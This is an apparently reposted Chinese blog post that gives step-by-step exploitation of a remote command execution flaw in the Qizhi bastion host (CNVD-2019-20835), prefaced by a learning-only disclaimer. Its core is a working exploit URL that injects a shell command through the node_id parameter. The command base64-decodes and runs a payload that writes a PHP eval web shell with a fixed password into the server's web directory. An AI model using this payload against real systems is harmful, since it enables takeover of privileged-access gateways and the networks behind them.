齐治堡垒机远程命令执行漏洞[CNVD-2019-20835] - 码上快乐

相关内容简体繁体

齐治堡垒机远程命令执行漏洞[CNVD-2019-20835]

本文转载自查看原文 2020-09-13 16:11 854 Web安全/ 技巧

请遵守网络安全法！！！本文仅供学习交流使用！用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关！读者自行承担其恶果！

利用过程

访问http://127.0.0.1/listener/cluster_manage.php 返回 "OK"

访问如下链接即可getshell，执行成功后，生成PHP一句话马
一句话马路径/var/www/shterm/resources/qrcode/lbj77.php  密码10086

https://127.0.0.1/ha_request.php?action=install&ipaddr=127.0.0.1&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 齐治堡垒机前台远程命令执行漏洞（CNVD-2019-20835）分析齐治堡垒机后台存在命令执行漏洞（CNVD-2019-17294）分析齐治堡垒机ShtermClient-2.1.1命令执行漏洞（CNVD-2019-09593）分析齐治堡垒机前台远程命令执行漏洞 Weblogic反序列化远程命令执行漏洞(CNVD-C-2019-48814)测试 WebLogic反序列化远程命令执行（CNVD-C-2019-48814）漏洞预警泛微OA E-cology（CNVD-2019-32204）远程命令执行漏洞复现分析 python之实现批量远程执行命令（堡垒机） CVE-2019-0193 远程命令执行-漏洞复现 Solr远程命令执行漏洞（CVE-2019-17558）

粤ICP备18138465号 © 2018-2025 CODEPRJ.COM